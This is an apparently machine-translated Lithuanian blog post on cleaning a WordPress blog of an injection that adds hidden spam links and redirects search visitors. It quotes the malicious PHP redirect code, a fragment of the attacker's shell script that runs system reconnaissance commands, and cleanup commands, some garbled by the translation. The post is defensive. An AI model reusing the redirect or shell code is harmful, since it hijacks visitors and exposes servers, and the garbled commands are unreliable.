Per pastarąjį mėnesį, aš gavo įspėjimus virusas dienoraštis kai lankytojams. Iš pradžių aš ignoruoti įspėjimus, nes aš įdiegta gana gerą antivirusinę (Kaspersky AV 2009) Ir nors ilgą laiką dienoraštį, aš niekada gavo Virus Alert (.. Mačiau kažką įtartiną anksčiau, kad pirmasis atnaujinimo dingo. Galiausiai ...).
Lėtai ėmė atsirasti labai įvairiai lankytojų,Po kurio eismo pastaruoju metu nuolat krito ir pradėjo vis daugiau ir daugiau žmonių, kurie pasakys man, kad stealthsettings.com ji yra virused. Vakar gavau iš asmens, ekrano daroma, kai antivirusinė užblokuotas scenarijus nuo stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Tai buvo gana įtikinamas man, kad aš įdėti visus šaltinius ieškoma. Pirma mintis, kuri atėjo į mano protas buvo padaryti patobulinti Naujausia versija WordPress (2.5.1), bet ne prieš ištrynus visus senojo scenarijaus failus WordPress ir pagaminti atsarginės duomenų bazės. Ši procedūra neveikė ir tikriausiai užtrukau ilgai, kol išsiaiškinau, kur yra klaida, jei ji man to nepasakė. Eugen į per kavos diskusijoje, jis rado nuoroda "Google" ir tai būtų gerai jį pamatyti.
„MyDigitalLife.info“ paskelbė straipsnį pavadinimu: „WordPress Nusilaužimas: atkurkite ir pataisykite „Google“ ir paieškos variklį arba slapukų srauto neperadresuotų į Your-Needs.info, AnyResults.Net, Golden-Info.net ir kitas neteisėtas svetaines"Tai iš siūlų man reikia pabaigos.
Tai apie išnaudoti de WordPress remiantis slapukais, Kuri, manau, yra labai sudėtinga ir padarė knygą. Protingas pakankamai, kad SQL injekcija Duomenų bazė dienoraštyje, sukurti nematomą vartotoją paprastas įprastas patikrinimas Prietaisų skydas->vartotojai, patikrinti serverio katalogus ir failus "įrašomus" (tai chmod 777), ieškoti ir į vykdyti failus su root vartotojui ar grupei privilegijų. Aš nežinau, kas išnaudoti vardą ir pamatyti, kad yra keletas straipsnių apie Jį parašyta, nepaisant to, kad daug dienoraščių yra užsikrėtę, įskaitant Rumuniją. Gerai ... Aš bandysiu pabandyti paaiškinti teiginiais apie virusą.
Kas yra virusas?
Pirma, įterpti šaltinio puslapių dienoraščių, nuorodas nematomas lankytojams, tačiau matoma ir indeksuoti paieškos sistemose, ypač Google. Tokiu būdu perduoti PageRank į nurodytose vietose užpuolikas. Antra, įterpiama kita peradresavimo kodas URL lankytojų ateina iš Google, Live, Yahoo ... arba RSS skaitytuvas, o ne svetainėje sausainis, antivirusinė aptinka nukreipti kaip Trojan-Clicker.HTML.
Simptomai:
Masyvi mažėja lankytojų srauto, Ypač dienoraščių, kur dauguma lankytojų ateina iš Google.
Identifikavimas: (čia problema tampa sudėtingesnė tiems, kurie mažai žino apie phpmyadmin, php ir linux)
LA. DĖMESIO! Pirma pasidaryti atsarginę duomenų bazės!
1. Patikrinkite šaltinio failus index.php, header.php, footer.php, Dienoraštis tema ir pamatyti, jei yra kodas, kuris naudojamas šifravimas base64 arba yra „if ($ ser ==“ 1? && sizeof ($ _ COOKIE) == 0) “formoje:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?><...> Arba kažkas. Ištrinti šį kodą!
Spauskite ant nuotraukos ...
Aukščiau pateiktoje ekrano kopijoje netyčia pasirinkau ir ". Tas kodas turi likti.
2. Naudoti phpMyAdmin ir eiti į duomenų bazės lentelę wp_usersKur patikrinti, ar nėra vartotojo vardas sukurtas 00:00:00 0000-00-00 (Galimas vieta user_login Rašyti "WordPress“. Užsirašykite šio vartotojo ID (ID lauką) ir ištrinkite.
Spauskite ant nuotraukos ...
* Žalia linija turėtų būti pašalintos ir išsaugojo savo ID. Tuo atveju, kai mieguistasBuvo ID = 8 .
3. Eiti į lentelę wp_usermeta, Kur yra ir pašalinti linijos ID (jei lauke user_id ID reikšmė rodoma ištrinama).
4. Lentelėje wp_optionEik active_plugins ir pamatyti, kas įskiepis įjungtas įtariamąjį. Jis gali būti naudojamas kaip galūnės _old.giff, _old.pngg, _old.jpeg, _new.php.giffir tt turtingų vaizdo plėtinių deriniai su _old ir _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Ištrinkite šį papildinį, tada eikite į tinklaraštį -> informacijos suvestinę -> papildinius, kur jūs išjungiate ir įjungiate bet kurį papildinį.
Paspauskite ant paveikslėlio, norėdami pamatyti atrodo active_plugins viruso failą.
Sekite kelią į FTP arba SSH, nurodyta active_plugins ir ištrinti iš serverio failą.
5. Visi phpMyAdmin, lentelėje wp_option, Rasti ir ištrinti eilutę, kurioje "rss_f541b3abd05e7962fcab37737f40fad8"Ir tarp"internal_links_cache ".
Be internal_links_cache yra pagaminti saugiame šlamšto saitus, rodomus savo dienoraštį ir kodas Google Adssprandas, Hakeris.
6. Rekomenduojama yra pakeisti slaptažodį Dienoraštis ir prisijungti pašalinti visus įtartinus userele. Atnaujinkite į naujausią versiją WordPress ir nustatykite, kad tinklaraštis nebeleistų registruotis naujiems vartotojams. Nėra nuostolių... taip pat gali komentuoti negyvenamas.
Aš bandžiau aukščiau šiek tiek paaiškinti, ką daryti tokioje situacijoje, kad išvalyčiau šio viruso tinklaraštį. Problema yra daug rimtesnė, nei atrodo, ir nėra beveik išspręsta, nes jie yra naudojami saugumo spragų serveris priegloba, kuris yra blogas.
Kaip pirmąją priemonę saugumo, su prieiga SSH, Padaryti kai kurie serveryje patikrinimus, pamatyti, jei bet kaip * _old * ir * _new. * Su galūnės failus.giff,. jpeg. pngg,. jpgg. Šie failai turi būti išbraukta. Jei pervardyti failą, pvz. top_right_old.giff in top_right_old.phpMes matome, kad failas yra tiksliai išnaudoti kodas serverį.
Keletas naudingų instrukcijų, kaip patikrinti, išvalyti ir apsaugoti serverį. (per SSH)
1. cd / tmp ir patikrinkite, ar ten yra aplankai, pavyzdžiui, tmpVFlma arba kiti deriniai turi tą patį pavadinimą ir jį pašalinti. Žiūrėti Apačioje, du tokie aplankus iš mane:
rm-rf foldername
2. Patikrinkite ir pašalinkite (pakeiskite chmod-ul) kiek įmanoma aplankus su atributais chmod 777
rasti visus įrašomus failus dabartiniame kataloge: Ieškoti. -Tipas f-Perm-2-LS
rasti visus įrašomus katalogų dabartinis rež: Ieškoti. -Type D-Permė-2-LS
rasti visus įrašomus katalogus ir failus dabartiniame kataloge: Ieškoti. -Permė-2-LS
3. Ieškoti įtartinų failų serveryje.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, DĖMESIO! failai, kurie buvo nustatyti tiek SUID si SGID. Šie failai vykdyti su vartotojas (grupė) arba iš šaknų, o ne vartotojas, kuris vykdyti failą privilegijų. Šie failai gali sukelti šaknų kompromisą, jei saugumo klausimai. Jei naudojate failus su Suid ir SGID bitai, atlikti "chmod 0 " į ar pašalinti paketą, kuriame jie.
Išnaudoti yra kažkur šaltinio ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Tokiu būdu ... iš esmės nustato pažeidimus saugumo srityje. Uostai atidaryti katalogus "įrašomus" ir grupė vykdymo privilegijomis failus / root.
Atgal daugiau ...
Kai kurie dienoraščiai užsikrėtę: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociklininkas.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... Sąrašas tęsiasi ... daug.
Galite patikrinti, ar tinklaraštis yra užkrėstas, naudodami „Google“ paieškos variklį. Kopijuoti įklijuoti:
Svetainės www.blegoo.com pirkti
Labos nakties ir gero darbo;) Netrukus manau, kad Eugenas ateis su naujienomis, numatomose svetainėse.
BRB :)
DĖMESIO! Keičiant temą WordPress arba atnaujinti į WordPress 2.5.1, NĖRA sprendimas atsikratyti šio viruso.
